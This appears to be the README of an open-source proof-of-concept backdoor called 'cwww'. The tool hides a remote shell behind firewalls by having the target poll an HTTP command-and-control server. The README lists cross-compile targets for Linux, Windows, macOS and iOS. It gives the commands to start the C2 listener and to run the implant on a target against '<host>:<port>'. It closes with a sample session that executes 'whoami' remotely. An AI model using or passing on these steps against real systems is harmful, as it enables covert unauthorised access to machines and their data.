There is no way to win without losing first
A proof-of-concept of placing backdoors behind firewalls using HTTP communication with command & control server. This tool uses HTTP requests to fetch commands and return output to a control server.
make TARGET=<target>
NOTE: For macOS / iOS targets you are required to set SDK to the desired SDK path before running make. For example:
make TARGET=<target> SDK=<path>
You can find list of supported TARGET values for different platforms.
Linux
aarch64-linux-muslarmv5l-linux-musleabii486-linux-muslx86_64-linux-muslpowerpc-linux-muslsfpowerpc64le-linux-muslmips-linux-muslsfmipsel-linux-muslsfmips64-linux-musls390x-linux-muslWindows
x86_64-w64-mingw32x86_64-w64-mingw32macOS / iOS
arm-iphone-darwinaarch64-iphone-darwini386-apple-darwinx86_64-apple-darwinaarch64-apple-darwin- Execute
main.py <host> <port>on command & control server - Execute
cwww http://<host>:<port>on target system
Example:
Welcome to the cwww-shell v1.0 by Ivan Nikolskiy / enty8080
Introduction: Wait for your client to connect, examine it's output and then
type in your commands to execute on client. You'll have to
wait some time between commands. Use ";" for multiple commands.
Trying to execute interactive commands may give you headache
so beware. You also shouldn't try to view binary data too.
"echo bla >> file", "cat >> file <<- EOF", sed etc. are your
friends if you don't like using vi in a delayed line mode.
To exit this program on any time without doing harm to either
server or client just type "quit".
Waiting for connect ... connect from 127.0.0.1:50194
$ whoami
sent.
Waiting for connect ... connect from 127.0.0.1:50195
felix
Waiting for connect ... connect from 127.0.0.1:50197
$